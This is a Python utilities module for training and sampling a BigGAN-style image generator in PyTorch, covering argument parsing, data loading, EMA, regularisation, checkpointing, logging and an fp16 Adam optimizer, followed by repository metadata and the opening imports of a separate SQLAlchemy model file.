'--ema_start', type=int, default=0,
help='When to start updating the EMA weights (default: %(default)s)')
### Numerical precision and SV stuff ###
parser.add_argument(
'--adam_eps', type=float, default=1e-8,
help='epsilon value to use for Adam (default: %(default)s)')
parser.add_argument(
'--BN_eps', type=float, default=1e-5,
help='epsilon value to use for BatchNorm (default: %(default)s)')
parser.add_argument(
'--SN_eps', type=float, default=1e-8,
help='epsilon value to use for Spectral Norm(default: %(default)s)')
parser.add_argument(
'--num_G_SVs', type=int, default=1,
help='Number of SVs to track in G (default: %(default)s)')
parser.add_argument(
'--num_D_SVs', type=int, default=1,
help='Number of SVs to track in D (default: %(default)s)')
parser.add_argument(
'--num_G_SV_itrs', type=int, default=1,
help='Number of SV itrs in G (default: %(default)s)')
parser.add_argument(
'--num_D_SV_itrs', type=int, default=1,
help='Number of SV itrs in D (default: %(default)s)')
### Ortho reg stuff ###
parser.add_argument(
'--G_ortho', type=float, default=0.0, # 1e-4 is default for BigGAN
help='Modified ortho reg coefficient in G(default: %(default)s)')
parser.add_argument(
'--D_ortho', type=float, default=0.0,
help='Modified ortho reg coefficient in D (default: %(default)s)')
parser.add_argument(
'--toggle_grads', action='store_true', default=True,
help='Toggle D and G''s "requires_grad" settings when not training them? '
' (default: %(default)s)')
### Which train function ###
parser.add_argument(
'--which_train_fn', type=str, default='GAN',
help='How2trainyourbois (default: %(default)s)')
### Resume training stuff
parser.add_argument(
'--load_weights', type=str, default='',
help='Suffix for which weights to load (e.g. best0, copy0) '
'(default: %(default)s)')
parser.add_argument(
'--resume', action='store_true', default=False,
help='Resume training? (default: %(default)s)')
### Log stuff ###
parser.add_argument(
'--logstyle', type=str, default='%3.3e',
help='What style to use when logging training metrics?'
'One of: %#.#f/ %#.#e (float/exp, text),'
'pickle (python pickle),'
'npz (numpy zip),'
'mat (MATLAB .mat file) (default: %(default)s)')
parser.add_argument(
'--log_G_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in G? '
'(default: %(default)s)')
parser.add_argument(
'--log_D_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in D? '
'(default: %(default)s)')
parser.add_argument(
'--sv_log_interval', type=int, default=10,
help='Iteration interval for logging singular values '
' (default: %(default)s)')
return parser
# Arguments for sample.py; not presently used in train.py
def add_sample_parser(parser):
parser.add_argument(
'--sample_npz', action='store_true', default=False,
help='Sample "sample_num_npz" images and save to npz? '
'(default: %(default)s)')
parser.add_argument(
'--sample_num_npz', type=int, default=50000,
help='Number of images to sample when sampling NPZs '
'(default: %(default)s)')
parser.add_argument(
'--sample_sheets', action='store_true', default=False,
help='Produce class-conditional sample sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_interps', action='store_true', default=False,
help='Produce interpolation sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_sheet_folder_num', type=int, default=-1,
help='Number to use for the folder for these sample sheets '
'(default: %(default)s)')
parser.add_argument(
'--sample_random', action='store_true', default=False,
help='Produce a single random sheet? (default: %(default)s)')
parser.add_argument(
'--sample_trunc_curves', type=str, default='',
help='Get inception metrics with a range of variances?'
'To use this, specify a startpoint, step, and endpoint, e.g. '
'--sample_trunc_curves 0.2_0.1_1.0 for a startpoint of 0.2, '
'endpoint of 1.0, and stepsize of 1.0. Note that this is '
'not exactly identical to using tf.truncated_normal, but should '
'have approximately the same effect. (default: %(default)s)')
parser.add_argument(
'--sample_inception_metrics', action='store_true', default=False,
help='Calculate Inception metrics with sample.py? (default: %(default)s)')
return parser
# Convenience dicts
dset_dict = {'I32': dset.ImageFolder, 'I64': dset.ImageFolder,
'I128': dset.ImageFolder, 'I256': dset.ImageFolder,
'I32_hdf5': dset.ILSVRC_HDF5, 'I64_hdf5': dset.ILSVRC_HDF5,
'I128_hdf5': dset.ILSVRC_HDF5, 'I256_hdf5': dset.ILSVRC_HDF5,
'C10': dset.CIFAR10, 'C100': dset.CIFAR100}
imsize_dict = {'I32': 32, 'I32_hdf5': 32,
'I64': 64, 'I64_hdf5': 64,
'I128': 128, 'I128_hdf5': 128,
'I256': 256, 'I256_hdf5': 256,
'C10': 32, 'C100': 32}
root_dict = {'I32': 'ImageNet', 'I32_hdf5': 'ILSVRC32.hdf5',
'I64': 'ImageNet', 'I64_hdf5': 'ILSVRC64.hdf5',
'I128': 'ImageNet', 'I128_hdf5': 'ILSVRC128.hdf5',
'I256': 'ImageNet', 'I256_hdf5': 'ILSVRC256.hdf5',
'C10': 'CIFAR10', 'C100': 'cifar100'}
nclass_dict = {'I32': 1000, 'I32_hdf5': 1000,
'I64': 1000, 'I64_hdf5': 1000,
'I128': 1000, 'I128_hdf5': 1000,
'I256': 1000, 'I256_hdf5': 1000,
'C10': 10, 'C100': 100}
# Number of classes to put per sample sheet
classes_per_sheet_dict = {'I32': 50, 'I32_hdf5': 50,
'I64': 50, 'I64_hdf5': 50,
'I128': 20, 'I128_hdf5': 20,
'I256': 20, 'I256_hdf5': 20,
'C10': 10, 'C100': 100}
activation_dict = {'inplace_relu': nn.ReLU(inplace=True),
'relu': nn.ReLU(inplace=False),
'ir': nn.ReLU(inplace=True), }
class CenterCropLongEdge(object):
"""Crops the given PIL Image on the long edge.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
return transforms.functional.center_crop(img, min(img.size))
def __repr__(self):
return self.__class__.__name__
class RandomCropLongEdge(object):
"""Crops the given PIL Image on the long edge with a random start point.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
size = (min(img.size), min(img.size))
# Only step forward along this edge if it's the long edge
i = (0 if size[0] == img.size[0]
else np.random.randint(low=0, high=img.size[0] - size[0]))
j = (0 if size[1] == img.size[1]
else np.random.randint(low=0, high=img.size[1] - size[1]))
return transforms.functional.crop(img, i, j, size[0], size[1])
def __repr__(self):
return self.__class__.__name__
# multi-epoch Dataset sampler to avoid memory leakage and enable resumption of
# training from the same sample regardless of if we stop mid-epoch
class MultiEpochSampler(torch.utils.data.Sampler):
r"""Samples elements randomly over multiple epochs
Arguments:
data_source (Dataset): dataset to sample from
num_epochs (int) : Number of times to loop over the dataset
start_itr (int) : which iteration to begin from
"""
def __init__(self, data_source, num_epochs, start_itr=0, batch_size=128):
self.data_source = data_source
self.num_samples = len(self.data_source)
self.num_epochs = num_epochs
self.start_itr = start_itr
self.batch_size = batch_size
if not isinstance(self.num_samples, int) or self.num_samples <= 0:
raise ValueError("num_samples should be a positive integeral "
"value, but got num_samples={}".format(self.num_samples))
def __iter__(self):
n = len(self.data_source)
# Determine number of epochs
num_epochs = int(np.ceil((n * self.num_epochs
- (self.start_itr * self.batch_size)) / float(n)))
# Sample all the indices, and then grab the last num_epochs index sets;
# This ensures if we're starting at epoch 4, we're still grabbing epoch 4's
# indices
out = [torch.randperm(n) for epoch in range(self.num_epochs)][-num_epochs:]
# Ignore the first start_itr % n indices of the first epoch
out[0] = out[0][(self.start_itr * self.batch_size % n):]
# if self.replacement:
# return iter(torch.randint(high=n, size=(self.num_samples,), dtype=torch.int64).tolist())
# return iter(.tolist())
output = torch.cat(out).tolist()
print('Length dataset output is %d' % len(output))
return iter(output)
def __len__(self):
return len(self.data_source) * self.num_epochs - self.start_itr * self.batch_size
# Convenience function to centralize all data loaders
def get_data_loaders(dataset, data_root=None, augment=False, batch_size=64,
num_workers=8, shuffle=True, load_in_mem=False, hdf5=False,
pin_memory=True, drop_last=True, start_itr=0,
num_epochs=500, use_multiepoch_sampler=False,
**kwargs):
# Append /FILENAME.hdf5 to root if using hdf5
data_root += '/%s' % root_dict[dataset]
print('Using dataset root location %s' % data_root)
which_dataset = dset_dict[dataset]
norm_mean = [0.5, 0.5, 0.5]
norm_std = [0.5, 0.5, 0.5]
image_size = imsize_dict[dataset]
# For image folder datasets, name of the file where we store the precomputed
# image locations to avoid having to walk the dirs every time we load.
dataset_kwargs = {'index_filename': '%s_imgs.npz' % dataset}
# HDF5 datasets have their own inbuilt transform, no need to train_transform
if 'hdf5' in dataset:
train_transform = None
else:
if augment:
print('Data will be augmented...')
if dataset in ['C10', 'C100']:
train_transform = [transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()]
else:
train_transform = [RandomCropLongEdge(),
transforms.Resize(image_size),
transforms.RandomHorizontalFlip()]
else:
print('Data will not be augmented...')
if dataset in ['C10', 'C100']:
train_transform = []
else:
train_transform = [CenterCropLongEdge(), transforms.Resize(image_size)]
# train_transform = [transforms.Resize(image_size), transforms.CenterCrop]
train_transform = transforms.Compose(train_transform + [
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std)])
train_set = which_dataset(root=data_root, transform=train_transform,
load_in_mem=load_in_mem, **dataset_kwargs)
# Prepare loader; the loaders list is for forward compatibility with
# using validation / test splits.
loaders = []
if use_multiepoch_sampler:
print('Using multiepoch sampler from start_itr %d...' % start_itr)
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory}
sampler = MultiEpochSampler(train_set, num_epochs, start_itr, batch_size)
train_loader = DataLoader(train_set, batch_size=batch_size,
sampler=sampler, **loader_kwargs)
else:
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory,
'drop_last': drop_last} # Default, drop last incomplete batch
train_loader = DataLoader(train_set, batch_size=batch_size,
shuffle=shuffle, **loader_kwargs)
loaders.append(train_loader)
return loaders
# Utility file to seed rngs
def seed_rng(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
# Utility to peg all roots to a base root
# If a base root folder is provided, peg all other root folders to it.
def update_config_roots(config):
if config['base_root']:
print('Pegging all root folders to base root %s' % config['base_root'])
for key in ['weights', 'logs', 'samples']:
config['%s_root' % key] = '%s/%s' % (config['base_root'], key)
return config
# Utility to prepare root folders if they don't exist; parent folder must exist
def prepare_root(config):
for key in ['weights_root', 'logs_root', 'samples_root']:
if not os.path.exists(config[key]):
print('Making directory %s for %s...' % (config[key], key))
os.mkdir(config[key])
# Simple wrapper that applies EMA to a model. COuld be better done in 1.0 using
# the parameters() and buffers() module functions, but for now this works
# with state_dicts using .copy_
class ema(object):
def __init__(self, source, target, decay=0.9999, start_itr=0):
self.source = source
self.target = target
self.decay = decay
# Optional parameter indicating what iteration to start the decay at
self.start_itr = start_itr
# Initialize target's params to be source's
self.source_dict = self.source.state_dict()
self.target_dict = self.target.state_dict()
print('Initializing EMA parameters to be source parameters...')
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.source_dict[key].data)
# target_dict[key].data = source_dict[key].data # Doesn't work!
def update(self, itr=None):
# If an iteration counter is provided and itr is less than the start itr,
# peg the ema weights to the underlying weights.
if itr and itr < self.start_itr:
decay = 0.0
else:
decay = self.decay
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.target_dict[key].data * decay
+ self.source_dict[key].data * (1 - decay))
# Apply modified ortho reg to a model
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes, and not in the blacklist
if len(param.shape) < 2 or any([param is item for item in blacklist]):
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
* (1. - torch.eye(w.shape[0], device=w.device)), w))
param.grad.data += strength * grad.view(param.shape)
# Default ortho reg
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def default_ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes & not in blacklist
if len(param.shape) < 2 or param in blacklist:
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
- torch.eye(w.shape[0], device=w.device), w))
param.grad.data += strength * grad.view(param.shape)
# Convenience utility to switch off requires_grad
def toggle_grad(model, on_or_off):
for param in model.parameters():
param.requires_grad = on_or_off
# Function to join strings or ignore them
# Base string is the string to link "strings," while strings
# is a list of strings or Nones.
def join_strings(base_string, strings):
return base_string.join([item for item in strings if item])
# Save a model's weights, optimizer, and the state_dict
def save_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None):
root = '/'.join([weights_root, experiment_name])
if not os.path.exists(root):
os.mkdir(root)
if name_suffix:
print('Saving weights to %s/%s...' % (root, name_suffix))
else:
print('Saving weights to %s...' % root)
torch.save(G.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G', name_suffix])))
torch.save(G.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix])))
torch.save(D.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D', name_suffix])))
torch.save(D.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix])))
torch.save(state_dict,
'%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))
if G_ema is not None:
torch.save(G_ema.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix])))
# Load a model's weights, optimizer, and the state_dict
def load_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None, strict=True, load_optim=True):
root = '/'.join([weights_root, experiment_name])
if name_suffix:
print('Loading %s weights from %s...' % (name_suffix, root))
else:
print('Loading weights from %s...' % root)
if G is not None:
G.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G', name_suffix]))),
strict=strict)
if load_optim:
G.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix]))))
if D is not None:
D.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D', name_suffix]))),
strict=strict)
if load_optim:
D.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix]))))
# Load state dict
for item in state_dict:
state_dict[item] = torch.load('%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))[item]
if G_ema is not None:
G_ema.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix]))),
strict=strict)
''' MetricsLogger originally stolen from VoxNet source code.
Used for logging inception metrics'''
class MetricsLogger(object):
def __init__(self, fname, reinitialize=False):
self.fname = fname
self.reinitialize = reinitialize
if os.path.exists(self.fname):
if self.reinitialize:
print('{} exists, deleting...'.format(self.fname))
os.remove(self.fname)
def log(self, record=None, **kwargs):
"""
Assumption: no newlines in the input.
"""
if record is None:
record = {}
record.update(kwargs)
record['_stamp'] = time.time()
with open(self.fname, 'a') as f:
f.write(json.dumps(record, ensure_ascii=True) + '\n')
# Logstyle is either:
# '%#.#f' for floating point representation in text
# '%#.#e' for exponent representation in text
# 'npz' for output to npz # NOT YET SUPPORTED
# 'pickle' for output to a python pickle # NOT YET SUPPORTED
# 'mat' for output to a MATLAB .mat file # NOT YET SUPPORTED
class MyLogger(object):
def __init__(self, fname, reinitialize=False, logstyle='%3.3f'):
self.root = fname
if not os.path.exists(self.root):
os.mkdir(self.root)
self.reinitialize = reinitialize
self.metrics = []
self.logstyle = logstyle # One of '%3.3f' or like '%3.3e'
# Delete log if re-starting and log already exists
def reinit(self, item):
if os.path.exists('%s/%s.log' % (self.root, item)):
if self.reinitialize:
# Only print the removal mess
if 'sv' in item:
if not any('sv' in item for item in self.metrics):
print('Deleting singular value logs...')
else:
print('{} exists, deleting...'.format('%s_%s.log' % (self.root, item)))
os.remove('%s/%s.log' % (self.root, item))
# Log in plaintext; this is designed for being read in MATLAB(sorry not sorry)
def log(self, itr, **kwargs):
for arg in kwargs:
if arg not in self.metrics:
if self.reinitialize:
self.reinit(arg)
self.metrics += [arg]
if self.logstyle == 'pickle':
print('Pickle not currently supported...')
# with open('%s/%s.log' % (self.root, arg), 'a') as f:
# pickle.dump(kwargs[arg], f)
elif self.logstyle == 'mat':
print('.mat logstyle not currently supported...')
else:
with open('%s/%s.log' % (self.root, arg), 'a') as f:
f.write('%d: %s\n' % (itr, self.logstyle % kwargs[arg]))
# Write some metadata to the logs directory
def write_metadata(logs_root, experiment_name, config, state_dict):
with open(('%s/%s/metalog.txt' %
(logs_root, experiment_name)), 'w') as writefile:
writefile.write('datetime: %s\n' % str(datetime.datetime.now()))
writefile.write('config: %s\n' % str(config))
writefile.write('state: %s\n' % str(state_dict))
"""
Very basic progress indicator to wrap an iterable in.
Author: Jan Schlüter
Andy's adds: time elapsed in addition to ETA, makes it possible to add
estimated time to 1k iters instead of estimated time to completion.
"""
def progress(items, desc='', total=None, min_delay=0.1, displaytype='s1k'):
"""
Returns a generator over `items`, printing the number and percentage of
items processed and the estimated remaining processing time before yielding
the next item. `total` gives the total number of items (required if `items`
has no length), and `min_delay` gives the minimum time in seconds between
subsequent prints. `desc` gives an optional prefix text (end with a space).
"""
total = total or len(items)
t_start = time.time()
t_last = 0
for n, item in enumerate(items):
t_now = time.time()
if t_now - t_last > min_delay:
print("\r%s%d/%d (%6.2f%%)" % (
desc, n + 1, total, n / float(total) * 100), end=" ")
if n > 0:
if displaytype == 's1k': # minutes/seconds for 1000 iters
next_1000 = n + (1000 - n % 1000)
t_done = t_now - t_start
t_1k = t_done / n * next_1000
outlist = list(divmod(t_done, 60)) + list(divmod(t_1k - t_done, 60))
print("(TE/ET1k: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
else: # displaytype == 'eta':
t_done = t_now - t_start
t_total = t_done / n * total
outlist = list(divmod(t_done, 60)) + list(divmod(t_total - t_done, 60))
print("(TE/ETA: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
sys.stdout.flush()
t_last = t_now
yield item
t_total = time.time() - t_start
print("\r%s%d/%d (100.00%%) (took %d:%02d)" % ((desc, total, total) +
divmod(t_total, 60)))
# Sample function for use with inception metrics
def sample(G, z_, y_, config):
with torch.no_grad():
z_.sample_()
y_.sample_()
if config['parallel']:
G_z = nn.parallel.data_parallel(G, (z_, G.shared(y_)))
else:
G_z = G(z_, G.shared(y_))
return G_z, y_
# Sample function for sample sheets
def sample_sheet(G, classes_per_sheet, num_classes, samples_per_class, parallel,
samples_root, experiment_name, folder_number, z_=None):
# Prepare sample directory
if not os.path.isdir('%s/%s' % (samples_root, experiment_name)):
os.mkdir('%s/%s' % (samples_root, experiment_name))
if not os.path.isdir('%s/%s/%d' % (samples_root, experiment_name, folder_number)):
os.mkdir('%s/%s/%d' % (samples_root, experiment_name, folder_number))
# loop over total number of sheets
for i in range(num_classes // classes_per_sheet):
ims = []
y = torch.arange(i * classes_per_sheet, (i + 1) * classes_per_sheet, device='cuda')
for j in range(samples_per_class):
if (z_ is not None) and hasattr(z_, 'sample_') and classes_per_sheet <= z_.size(0):
z_.sample_()
else:
z_ = torch.randn(classes_per_sheet, G.dim_z, device='cuda')
with torch.no_grad():
if parallel:
o = nn.parallel.data_parallel(G, (z_[:classes_per_sheet], G.shared(y)))
else:
o = G(z_[:classes_per_sheet], G.shared(y))
ims += [o.data.cpu()]
# This line should properly unroll the images
out_ims = torch.stack(ims, 1).view(-1, ims[0].shape[1], ims[0].shape[2],
ims[0].shape[3]).data.float().cpu()
# The path for the samples
image_filename = '%s/%s/%d/samples%d.jpg' % (samples_root, experiment_name,
folder_number, i)
torchvision.utils.save_image(out_ims, image_filename,
nrow=samples_per_class, normalize=True)
# Interp function; expects x0 and x1 to be of shape (shape0, 1, rest_of_shape..)
def interp(x0, x1, num_midpoints):
lerp = torch.linspace(0, 1.0, num_midpoints + 2, device='cuda').to(x0.dtype)
return (x0 * (1 - lerp.view(1, -1, 1))) + (x1 * lerp.view(1, -1, 1))
# interp sheet function
# Supports full, class-wise and intra-class interpolation
def interp_sheet(G, num_per_sheet, num_midpoints, num_classes, parallel,
samples_root, experiment_name, folder_number, sheet_number=0,
fix_z=False, fix_y=False, device='cuda'):
# Prepare zs and ys
if fix_z: # If fix Z, only sample 1 z per row
zs = torch.randn(num_per_sheet, 1, G.dim_z, device=device)
zs = zs.repeat(1, num_midpoints + 2, 1).view(-1, G.dim_z)
else:
zs = interp(torch.randn(num_per_sheet, 1, G.dim_z, device=device),
torch.randn(num_per_sheet, 1, G.dim_z, device=device),
num_midpoints).view(-1, G.dim_z)
if fix_y: # If fix y, only sample 1 z per row
ys = sample_1hot(num_per_sheet, num_classes)
ys = G.shared(ys).view(num_per_sheet, 1, -1)
ys = ys.repeat(1, num_midpoints + 2, 1).view(num_per_sheet * (num_midpoints + 2), -1)
else:
ys = interp(G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
num_midpoints).view(num_per_sheet * (num_midpoints + 2), -1)
# Run the net--note that we've already passed y through G.shared.
if G.fp16:
zs = zs.half()
with torch.no_grad():
if parallel:
out_ims = nn.parallel.data_parallel(G, (zs, ys)).data.cpu()
else:
out_ims = G(zs, ys).data.cpu()
interp_style = '' + ('Z' if not fix_z else '') + ('Y' if not fix_y else '')
image_filename = '%s/%s/%d/interp%s%d.jpg' % (samples_root, experiment_name,
folder_number, interp_style,
sheet_number)
torchvision.utils.save_image(out_ims, image_filename,
nrow=num_midpoints + 2, normalize=True)
# Convenience debugging function to print out gradnorms and shape from each layer
# May need to rewrite this so we can actually see which parameter is which
def print_grad_norms(net):
gradsums = [[float(torch.norm(param.grad).item()),
float(torch.norm(param).item()), param.shape]
for param in net.parameters()]
order = np.argsort([item[0] for item in gradsums])
print(['%3.3e,%3.3e, %s' % (gradsums[item_index][0],
gradsums[item_index][1],
str(gradsums[item_index][2]))
for item_index in order])
# Get singular values to log. This will use the state dict to find them
# and substitute underscores for dots.
def get_SVs(net, prefix):
d = net.state_dict()
return {('%s_%s' % (prefix, key)).replace('.', '_'):
float(d[key].item())
for key in d if 'sv' in key}
# Name an experiment based on its config
def name_from_config(config):
name = '_'.join([
item for item in [
'Big%s' % config['which_train_fn'],
config['dataset'],
config['model'] if config['model'] != 'BigGAN' else None,
'seed%d' % config['seed'],
'Gch%d' % config['G_ch'],
'Dch%d' % config['D_ch'],
'Gd%d' % config['G_depth'] if config['G_depth'] > 1 else None,
'Dd%d' % config['D_depth'] if config['D_depth'] > 1 else None,
'bs%d' % config['batch_size'],
'Gfp16' if config['G_fp16'] else None,
'Dfp16' if config['D_fp16'] else None,
'nDs%d' % config['num_D_steps'] if config['num_D_steps'] > 1 else None,
'nDa%d' % config['num_D_accumulations'] if config['num_D_accumulations'] > 1 else None,
'nGa%d' % config['num_G_accumulations'] if config['num_G_accumulations'] > 1 else None,
'Glr%2.1e' % config['G_lr'],
'Dlr%2.1e' % config['D_lr'],
'GB%3.3f' % config['G_B1'] if config['G_B1'] != 0.0 else None,
'GBB%3.3f' % config['G_B2'] if config['G_B2'] != 0.999 else None,
'DB%3.3f' % config['D_B1'] if config['D_B1'] != 0.0 else None,
'DBB%3.3f' % config['D_B2'] if config['D_B2'] != 0.999 else None,
'Gnl%s' % config['G_nl'],
'Dnl%s' % config['D_nl'],
'Ginit%s' % config['G_init'],
'Dinit%s' % config['D_init'],
'G%s' % config['G_param'] if config['G_param'] != 'SN' else None,
'D%s' % config['D_param'] if config['D_param'] != 'SN' else None,
'Gattn%s' % config['G_attn'] if config['G_attn'] != '0' else None,
'Dattn%s' % config['D_attn'] if config['D_attn'] != '0' else None,
'Gortho%2.1e' % config['G_ortho'] if config['G_ortho'] > 0.0 else None,
'Dortho%2.1e' % config['D_ortho'] if config['D_ortho'] > 0.0 else None,
config['norm_style'] if config['norm_style'] != 'bn' else None,
'cr' if config['cross_replica'] else None,
'Gshared' if config['G_shared'] else None,
'hier' if config['hier'] else None,
'ema' if config['ema'] else None,
config['name_suffix'] if config['name_suffix'] else None,
]
if item is not None])
# dogball
if config['hashname']:
return hashname(name)
else:
return name
# A simple function to produce a unique experiment name from the animal hashes.
# def hashname(name):
# h = hash(name)
# a = h % len(animal_hash.a)
# h = h // len(animal_hash.a)
# b = h % len(animal_hash.b)
# h = h // len(animal_hash.c)
# c = h % len(animal_hash.c)
# return animal_hash.a[a] + animal_hash.b[b] + animal_hash.c[c]
# Get GPU memory, -i is the index
def query_gpu(indices):
os.system('nvidia-smi -i 0 --query-gpu=memory.free --format=csv')
# Convenience function to count the number of parameters in a module
def count_parameters(module):
print('Number of parameters: {}'.format(
sum([p.data.nelement() for p in module.parameters()])))
# Convenience function to sample an index, not actually a 1-hot
def sample_1hot(batch_size, num_classes, device='cuda'):
return torch.randint(low=0, high=num_classes, size=(batch_size,),
device=device, dtype=torch.int64, requires_grad=False)
# A highly simplified convenience class for sampling from distributions
# One could also use PyTorch's inbuilt distributions package.
# Note that this class requires initialization to proceed as
# x = Distribution(torch.randn(size))
# x.init_distribution(dist_type, **dist_kwargs)
# x = x.to(device,dtype)
# This is partially based on https://discuss.pytorch.org/t/subclassing-torch-tensor/23754/2
class Distribution(torch.Tensor):
# Init the params of the distribution
def init_distribution(self, dist_type, **kwargs):
self.dist_type = dist_type
self.dist_kwargs = kwargs
if self.dist_type == 'normal':
self.mean, self.var = kwargs['mean'], kwargs['var']
elif self.dist_type == 'categorical':
self.num_categories = kwargs['num_categories']
def sample_(self):
if self.dist_type == 'normal':
self.normal_(self.mean, self.var)
elif self.dist_type == 'categorical':
self.random_(0, self.num_categories)
# return self.variable
# Silly hack: overwrite the to() method to wrap the new object
# in a distribution as well
def to(self, *args, **kwargs):
new_obj = Distribution(self)
new_obj.init_distribution(self.dist_type, **self.dist_kwargs)
new_obj.data = super().to(*args, **kwargs)
return new_obj
# Convenience function to prepare a z and y vector
def prepare_z_y(G_batch_size, dim_z, nclasses, device='cuda',
fp16=False, z_var=1.0):
z_ = Distribution(torch.randn(G_batch_size, dim_z, requires_grad=False))
z_.init_distribution('normal', mean=0, var=z_var)
z_ = z_.to(device, torch.float16 if fp16 else torch.float32)
if fp16:
z_ = z_.half()
y_ = Distribution(torch.zeros(G_batch_size, requires_grad=False))
y_.init_distribution('categorical', num_categories=nclasses)
y_ = y_.to(device, torch.int64)
return z_, y_
def initiate_standing_stats(net):
for module in net.modules():
if hasattr(module, 'accumulate_standing'):
module.reset_stats()
module.accumulate_standing = True
def accumulate_standing_stats(net, z, y, nclasses, num_accumulations=16):
initiate_standing_stats(net)
net.train()
for i in range(num_accumulations):
with torch.no_grad():
z.normal_()
y.random_(0, nclasses)
x = net(z, net.shared(y)) # No need to parallelize here unless using syncbn
# Set to eval mode
net.eval()
# This version of Adam keeps an fp32 copy of the parameters and
# does all of the parameter updates in fp32, while still doing the
# forwards and backwards passes using fp16 (i.e. fp16 copies of the
# parameters and fp16 activations).
#
# Note that this calls .float().cuda() on the params.
import math
from torch.optim.optimizer import Optimizer
class Adam16(Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay)
params = list(params)
super(Adam16, self).__init__(params, defaults)
# Safety modification to make sure we floatify our state
def load_state_dict(self, state_dict):
super(Adam16, self).load_state_dict(state_dict)
for group in self.param_groups:
for p in group['params']:
self.state[p]['exp_avg'] = self.state[p]['exp_avg'].float()
self.state[p]['exp_avg_sq'] = self.state[p]['exp_avg_sq'].float()
self.state[p]['fp32_p'] = self.state[p]['fp32_p'].float()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Fp32 copy of the weights
state['fp32_p'] = p.data.float()
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], state['fp32_p'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
state['fp32_p'].addcdiv_(-step_size, exp_avg, denom)
p.data = state['fp32_p'].half()
return loss
|
[
"l316652494@gmail.com"
] |
l316652494@gmail.com
|
4ba4638364b0e7648d4f4abc2d5e18a29c56e940
|
b487c6fe5ee7006ba986ed468198e3681088bd41
|
/Models/Working_Hours.py
|
861fcaf056bdd313dcdef09d090a9dd6be8abcee
|
[] |
no_license
|
jimist/yelp_crawler
|
cc9afbe08acc8e2c8b03b7c3c0d6a1ce49b3331c
|
4146bb6d1fa61d2e050bbf9494fa4cc09a2011a1
|
refs/heads/master
| 2022-12-11T07:25:12.853150
| 2019-05-09T19:04:23
| 2019-05-09T19:04:23
| 155,228,908
| 0
| 0
| null | 2022-07-06T20:00:46
| 2018-10-29T14:47:29
|
Python
|
UTF-8
|
Python
| false
| false
| 595
|
py
|
from sqlalchemy import (
Column,
ForeignKey,
Numeric,
Date,
JSON,
VARCHAR,
BOOLEAN,
)
from sqlalchemy.orm import relationship
from sqlalchemy.dialects.mysql import TINYINT,MEDIUMINT,CHAR
from Models.Model import Model
